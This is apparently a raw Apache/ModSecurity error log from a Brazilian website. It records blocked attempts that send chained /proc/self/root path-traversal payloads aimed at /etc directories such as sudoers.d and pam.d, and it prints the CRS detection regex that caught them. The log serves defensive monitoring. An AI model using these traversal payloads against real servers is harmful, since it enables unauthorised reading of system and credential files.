[Wed Mar 18 09:40:58.051897 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:41354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdWuyqAr6etmhZHNq0IAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:58.204793 2026] [mime_magic:error] [pid 30077:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:44500] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:41:03.091068 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:41360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdX_u8EFLIOrSqIpv53wAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:41:09.313126 2026] [mime_magic:error] [pid 31803:tid 140411548894976] (70014)End of file found: [client 57.141.18.19:45092] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:41:30.835285 2026] [mime_magic:error] [pid 15051:tid 140411632822016] (70014)End of file found: [client 57.141.18.16:45836] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:41:37.342991 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:55892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdgda6ubjKNq_cu4aN0wAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:41:44.375129 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:49676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdiOoXxyEfFpUF8f9jTwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:41:45.796379 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:52688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdidY0UrI5A3LftIyZhQAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:41:48.479101 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:52690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdjOyqAr6etmhZHNq0QAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:42:05.922996 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:44652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdncdf6f5d65gmYZTJtQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:42:27.398998 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:59024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqds9Y0UrI5A3LftIyZtQAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:42:29.764295 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:58426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdtda6ubjKNq_cu4aOCgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:42:31.598821 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:43330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdt-w_le52K8_3pV3UkAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:42:46.729077 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:43344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdxta6ubjKNq_cu4aOHQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:43:18.183213 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.228.61:60202] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqd5kzinOy1jxa1j4cJtAAAAQM"]
[Wed Mar 18 09:43:18.823183 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.244.43:45758] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqd5ta6ubjKNq_cu4aOUQAAA00"]
[Wed Mar 18 09:43:27.998765 2026] [mime_magic:error] [pid 17887:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:50874] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:43:28.569579 2026] [mime_magic:error] [pid 15051:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:51078] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:43:47.318047 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:36576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeA9Y0UrI5A3LftIyaHwAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:43:48.535424 2026] [mime_magic:error] [pid 11816:tid 140411733534464] (70014)End of file found: [client 74.7.243.128:49632] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/bin
[Wed Mar 18 09:43:52.175713 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:35774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeCPu8EFLIOrSqIpv6VgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:16.975778 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:35780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeIMdf6f5d65gmYZTKLQAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:44:23.959760 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:57016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeJymAPhZkrhU8w4lingAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:24.938050 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:54276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeKOw_le52K8_3pV3VFQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:27.671334 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:37614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeK8df6f5d65gmYZTKQQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:29.108432 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:37630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeLUzinOy1jxa1j4cJ4wAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:31.542476 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:39012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeLvu8EFLIOrSqIpv6dwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:33.150002 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:39028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] 